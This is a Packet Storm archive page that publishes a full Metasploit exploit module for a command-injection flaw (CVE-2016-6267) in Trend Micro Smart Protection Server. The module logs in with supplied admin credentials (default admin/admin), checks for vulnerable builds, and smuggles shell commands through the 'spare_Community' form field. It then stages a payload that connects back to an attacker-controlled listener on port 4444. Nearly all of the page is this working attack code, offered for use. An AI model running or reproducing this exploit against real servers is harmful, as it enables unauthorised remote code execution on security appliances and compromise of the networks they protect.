Twenty Year Anniversary

Trend Micro Smart Protection Server Exec Remote Code Injection

Trend Micro Smart Protection Server Exec Remote Code Injection
Posted Nov 15, 2016
Authored by Quentin Kaiser | Site metasploit.com

This Metasploit module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection. Please note: authentication is required to exploit this vulnerability.

tags | exploit
MD5 | 9f38f195a977ff44bf8c8f1d118e3eba

Trend Micro Smart Protection Server Exec Remote Code Injection

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'openssl'
require 'base64'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info={})
super(update_info(info,
'Name' => "Trend Micro Smart Protection Server Exec Remote Code Injection",
'Description' => %q{
This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection.
Please note: authentication is required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Quentin Kaiser <kaiserquentin[at]gmail.com>'
],
'References' =>
[
['CVE-ID', 'CVE-2016-6267']
],
'Platform' => 'linux',
'Targets' => [ [ 'Linux', {} ] ],
'Payload' => { 'BadChars' => "\x00" },
'CmdStagerFlavor' => [ 'bourne' ],
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true
},
'DisclosureDate' => "Aug 8 2016",
'DefaultTarget' => 0))

register_options(
[
OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptString.new('TARGETURI', [true, 'The base path', '/']),
OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address]),
OptPort.new('LPORT', [true, "The port SPS will connect back to ", 4444 ]),
OptString.new('ADMINACCOUNT', [true, 'Name of the SPS admin account', 'admin']),
OptString.new('ADMINPASS', [true, 'Password of the SPS admin account', 'admin']),
], self.class)
end


def check
opts = login
if opts
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "php/about.php?sid=#{opts['sid']}"),
'headers'=>
{
'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
'Origin' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
}
})
if res and res.code == 200
version = res.body.to_s.scan(/MSG_ABOUT_VERSION <\/td>[^<]*<td[^>]*>([^<]*)</).last.first.to_f
build = res.body.to_s.scan(/MSG_ABOUT_BUILD <\/td>[^<]*<td[^>]*><span[^>]*>([^<]*)</).last.first.to_i(10)
print_status("TrendMicro Smart Protection Server detected.")
print_status("Version: #{version}")
print_status("Build: #{build}")
if (version == 3.0 and build < 1330) or
(version == 2.6 and build < 2106) or
(version == 2.5 and build < 2200)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
end
Exploit::CheckCode::Unknown
end


def execute_command(cmd, opts = {})
uri = target_uri.path
send_request_cgi({
'method' => 'POST',
'version' => '1.0',
'timeout' => 1,
'uri' => normalize_uri(uri, 'php/admin_notification.php'),
'ctype' => 'application/x-www-form-urlencoded',
'headers'=>
{
'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
'Origin' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
},
'vars_post' => {
'EnableSNMP' => 'on',
'Community' => 'hello',
'submit' => 'Save',
'pubkey' => '',
'spare_EnableSNMP' => 1,
'spare_Community' => "test;#{cmd}",
'spare_EnableIPRestriction' => 0,
'spare_AllowGroupIP' => '',
'spare_AllowGroupNetmask' => '',
'sid' => opts["sid"]
}
})
end

def login
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
})
if res and res.code == 200 and !res.get_cookies.empty?
sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first.strip
sid_value = res.get_cookies.scan(/#{sid}=([a-z0-9]+);/).last.first
n = res.body.to_s.scan(/name="pubkey" value="([^"]*)"/).last.first
nonce = res.body.to_s.scan(/name="nonce" value="([^"]*)"/).last.first
asn1_sequence = OpenSSL::ASN1::Sequence.new(
[
OpenSSL::ASN1::Integer.new("0x#{n}".to_i(16)),
OpenSSL::ASN1::Integer.new("0x10001".to_i(16))
]
)
public_key = OpenSSL::PKey::RSA.new(asn1_sequence)
creds = "#{datastore['ADMINACCOUNT']}\t#{datastore['ADMINPASS']}\t#{nonce}"
data = Base64.encode64(public_key.public_encrypt(creds))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "auth.php"),
'ctype' => 'application/x-www-form-urlencoded',
'headers'=>
{
'Cookie' => "#{sid}=#{sid_value}",
'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
'Origin' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
},
'vars_post' => {
'data' => data,
'sid' => sid
}
})
if res and res.code == 302
if res.headers.key?('Set-Cookie')
sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first
sid_value = res.get_cookies.scan(/#{sid}=([^;]*);/).last.first
end
report_cred(
ip: datastore['RHOST'],
port: datastore['RPORT'],
service_name: (ssl ? "https" : "http"),
user: datastore['ADMINACCOUNT'],
password: datastore['ADMINPASS'],
proof: "#{sid}=#{sid_value}"
)
return {"sid" => sid, "sid_value" => sid_value}
end
end
nil
end

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)

create_credential_login(login_data)
end

def exploit
opts = login
if opts
print_status("Successfully logged in.")
print_status("Exploiting...")
execute_cmdstager(opts=opts)
else
print_error("An error occured while loggin in.")
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    20 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close